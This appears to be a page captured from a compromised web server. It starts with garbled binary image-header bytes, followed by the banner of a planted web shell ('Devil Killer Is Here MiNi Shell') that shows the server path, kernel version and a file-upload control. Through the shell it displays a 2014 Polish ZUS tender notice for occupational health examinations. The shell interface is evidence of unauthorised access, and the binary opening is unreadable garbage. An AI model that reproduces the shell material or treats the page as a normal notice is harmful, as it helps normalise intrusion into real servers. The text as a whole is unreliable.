JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141203/397248-N-2014.html

<p class="kh_header"><b>Biłgoraj: Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników O/ZUS w Rzeszowie  i podległych jednostek terenowych</b><br>
<b>Numer ogłoszenia: 397248 - 2014; data zamieszczenia: 03.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju , ul. Kościuszki 103, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6881202, 6881209, faks 84 6866974.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników O/ZUS w Rzeszowie  i podległych jednostek terenowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników O/ZUS w Rzeszowie  i podległych jednostek terenowych.
2.	Zamawiający dopuszcza składanie ofert częściowych w rozumieniu art. 36 ust. 2 pkt 1) ustawy Prawo Zamówień Publicznych ( t.j. Dz.U. z 09.08.2013r. poz. 907 ze zm. ) wg poniższego rozwiązania:
1)	Część I    -	w zakresie Oddziału ZUS w Rzeszowie, Al. J. Piłsudskiego 12,
2)	Część II   -	w zakresie Inspektoratu ZUS w Jarosławiu, ul. Słowackiego 21,	
3)	Część III  -	w zakresie Inspektoratu ZUS w Leżajsku, ul. Mickiewicza 24,
4)	Część IV  -	w zakresie Inspektoratu ZUS w Mielcu, ul. Sikorskiego 4,
5)	Część V   -	w zakresie Inspektoratu ZUS w Przemyślu, ul. Brodzińskiego 6,	
6)	Część VI   -  w zakresie Inspektoratu ZUS w Przeworsku, ul. Dworcowej 1,
7)	Część VII  -  w zakresie Inspektoratu ZUS w Stalowej Woli, ul. Popiełuszki 8,	
8)	Część VIII -  w zakresie Inspektoratu ZUS w Tarnobrzegu, ul. Sienkiewicza 145D, 
9)	Część IX  -  w zakresie Biura Terenowego w Lubaczowie, ul. Mickiewicza 168
3.	Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)	przeprowadzanie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)	udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)	wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)	prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)	wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
4.	W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
5.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą w szczególności:
a)	RTG płuc,
b)	Cholesterol,
c)	Badanie poziomu glukozy we krwi, 
d)	Badanie neurologiczne,
e)	Badanie laryngologiczne,
f)	Spirometria - dla wszystkich pracowników Wydziału OBD,
g)	Audiometria,
h)	EKG,
i)	Alat
j)	Badania psychotechniczne - kierowcy oraz pracownicy prowadzący samochód do celów służbowych),
k)	Bilirubina,
l)	Badania otolaryngologiczne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca/y:
a)Złoży stosowne oświadczenie, że spełnia w/w warunek.
b)Jest wpisany do rejestru podmiotów wykonujących działalność leczniczą zgodnie z ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2013 r. poz. 217 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca:
a)	Złoży stosowne oświadczenie, że spełnia w/w warunek,
Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca:
a)	Złoży stosowne oświadczenie, że spełnia w/w warunek,
b)	Złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. że dysponuje co najmniej jednym lekarzem, który posiada specjalizację: 
-w dziedzinie medycyny pracy zgodnie z Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz.U. z 1996r. Nr 69 poz.332 ze zm.),
-w zakresie wszelkich badań specjalistycznych objętych przedmiotem zamówienia lub wynikających z aktualnych potrzeb w zakresie możliwości wydania orzeczenia lekarskiego o braku lub istnieniu przeciwwskazań zdrowotnych do pracy na danym stanowisku w szczególności w dziedzinie okulistyki, laryngologii i neurologii.
Ocena spełniania w/w warunku w zakresie każdej części zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń z art. 22 ust. 1 upzp żądanych w  § 5 ust.1 pkt 1.1 siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Formularz oferty (stosownie do części na którą składana jest oferta) wypełniony i podpisany wg wzoru określonego zał. nr 4 do siwz. 2) Formularz cenowy (właściwy dla części na którą składana jest oferta) wypełniony i podpisany stosownie wg wzoru określonego zał. nr 5.1 lub 5.9 do siwz. 3) Pełnomocnictwo jeżeli zostało ustanowione</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 91</li>
<li>2 - Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia niniejszej umowy przewidziane w siwz przedmiotowego zamówienia  wymagają formy pisemnej pod rygorem nieważności.
2.	Zmiana umowy dokonana z naruszeniem przepisu art. 144 ust.1 ustawy Prawo zamówień publicznych jest nieważna.  
3.	Niedopuszczalna jest, pod rygorem nieważności, zmiana postanowień niniejszej umowy, za wyjątkiem okoliczności wskazanych w siwz (albo w ogłoszeniu). Zmiana taka wymaga każdorazowo zgody Zamawiającego i Wykonawcy i może być dokonana wyłącznie w formie pisemnego aneksu podpisanego przez obie strony. Dotyczy to w szczególności następujących sytuacji:
  
1)	Zmiany wynikające ze zmiany  sposobu spełnienia świadczenia: 
a)	zmiana miejsca i terminu i godzin wykonywania profilaktycznych badań lekarskich w ramach danego miasta pod warunkiem jeżeli nie zwiększy to wynagrodzenia należnego od Odbiorcy 
2)	Zmiany wynikające ze zmiany  przepisów prawa:  
a)	Konieczność realizowania jeszcze innych badań niż to wynika z zawartej umowy ze względu na wymogi wprowadzone zmianą przepisów prawa w tym zakresie. W takim przypadku Odbiorca zapłaci za niezbędne badania dodatkowe do których obligują nowe przepisy wg ceny lub cen nie wyższych niż oferowane przez Wykonawcę innym podmiotom. Badania takie muszą być przeprowadzane przez specjalistów posiadających odpowiedni stopień specjalizacji.  
b)	Wysokość wynagrodzenia Wykonawcy, o którym mowa w § 4 ust. 1 i 3 może ulec zmianie z zastrzeżeniem postanowień ust. 3 pkt 2) lit. c) i d), w przypadku zmiany:
-stawki podatku od towarów i usług (VAT),
-wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. Nr 200, poz. 1679,  z 2004r. Nr 240, poz. 2407 oraz z 2005r. Nr 157, poz. 1314)
-zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, 
jeżeli zmiany te będą miały wpływ na koszty wykonania przedmiotu umowy przez Wykonawcę.
c)	W przypadku zmiany przepisów, o których mowa w ppkt b), skutkujących istotną zmianą kosztów wykonania przedmiotu umowy przez Wykonawcę, każda ze Stron umowy, w terminie 30 dni od wejścia w życie przepisów wprowadzających te zmiany, może wystąpić do drugiej Strony o przeprowadzenie negocjacji w sprawie dokonania odpowiedniej zmiany wysokości wynagrodzenia (zmniejszenia lub zwiększenia). 
d)	Podstawą do przeprowadzenia negocjacji, o których mowa w ppkt c), będzie przedstawiana każdorazowo Zamawiającemu kalkulacja kosztów Wykonawcy, uwzględniająca wpływ wejścia w życie przepisów dokonujących te zmiany na koszty wykonania przedmiotu umowy przez Wykonawcę. Wykonawca będzie zobowiązany do przedstawienia stosownej kalkulacji na pisemne żądanie Zamawiającego w terminie 5 dni od otrzymania żądania.
e)	koszty ewentualnych zmian wynagrodzenia, o którym mowa w ust. 3 pkt 2) lit. b) -d) będą obciążały w równym stopniu każdą ze Stron umowy. 
3)	Pozostałe zmiany 
a)	wystąpienie jednokrotnie lub wielokrotnie siły wyższej np. klęski żywiołowej uniemożliwiającej prawidłowe wykonanie lub wykonanie w terminie przedmiotu umowy zgodnie z ofertą. Wówczas termin wykonania  przedmiotu zamówienia można przesunąć o czas niezbędny do należytego jego wykonania, nie dłużej jednak niż o okres trwania tych okoliczności. W takim przypadku Wykonawca musi na piśmie przedstawić i udowodnić zaistnienie powyższych okoliczności. 
b)	Konieczność wprowadzenia zmiany, która jest korzystna dla Odbiorcy. Wprowadzenie takiej zmiany jest możliwe pod warunkiem, że gdyby hipotetycznie dokonać jej wprowadzenia przed terminem składania ofert nie miałoby to wpływu na krąg Wykonawców ani też na wybór oferty najkorzystniejszej w danej części.
c)	Waloryzacja cen jednostkowych raz w roku począwszy od 2016 roku w oparciu o średnioroczny  wskaźnik cen towarów  i usług konsumpcyjnych ogółem, za rok poprzedni ogłaszanym przez Prezesa GUS na podstawie przepisów ustawy o emeryturach i rentach z FUS i po jego ogłoszeniu w Monitorze Polskim. Podstawą zmiany stawki będzie aneks do umowy.
4.	Nie stanowi zmiany umowy w szczególności:
1)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego na który jest regulowane wynagrodzenie). 
2)	zmiana danych teleadresowych,  
3)	zmiana osób upoważnionych do kontaktu w zakresie realizacji umowy o których mowa w § 10 ust. 5.
4)	utrata mocy lub zmiana aktów prawnych przywołanych w treści umowy, do których stosować należy przepisy obowiązujące w danym czasie

5.	Zmiany, o których mowa w ust. 4 dokonywane są w drodze jednostronnego pisemnego oświadczenia Strony w taki sposób aby komunikowana treść dotarła do drugiej Strony. Oświadczenie takie  i wywoła skutek od dnia doręczenia go drugiej Stronie w taki sposób aby mogła się z tym zapoznać.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju, Centrum Zamówień Publicznych, ul. Kościuszki 103, 23-400 Biłgoraj, tel. 84 688 12 02, 84 688 12 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2014 godzina 11:00, miejsce: Oddział ZUS w Biłgoraju, ul. Kościuszki 103, 23-400 Biłgoraj na sali obsługi klienta w okienku INFORMACJA OGÓLNA - dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Osoby uprawnione do porozumiewania się z Wykonawcami w zakresie ogólnym nie dotyczącym oświadczeń woli w zakresie wyjaśniania siwz w rozumieniu art. 38 ust.1 upzp: a)Dariusz Cios - Centrum Zamówień Publicznych tel. (84) 688 12 02, Biłgoraj, ul. Kościuszki 103. b)Lidia Wojtczak - Centrum Zamówień Publicznych tel. (84) 688 12 12, Biłgoraj, ul. Kościuszki 103. 2.Osoby uprawnione przez Zamawiającego do porozumiewania się z Wykonawcami w zakresie ogólnym nie dotyczącym oświadczeń woli w zakresie wyjaśniania siwz udzielają informacji w godz. 8:00 do 14:00 w dni robocze z wyjątkiem sobót i dni ustawowo wolnych od pracy. 3. Numer postępowania nadany sprawie przez Zamawiającego 030000/271/11/2014-CZP.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników O/ZUS w Rzeszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników 
Oddziału ZUS w Rzeszowie. 
2.Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
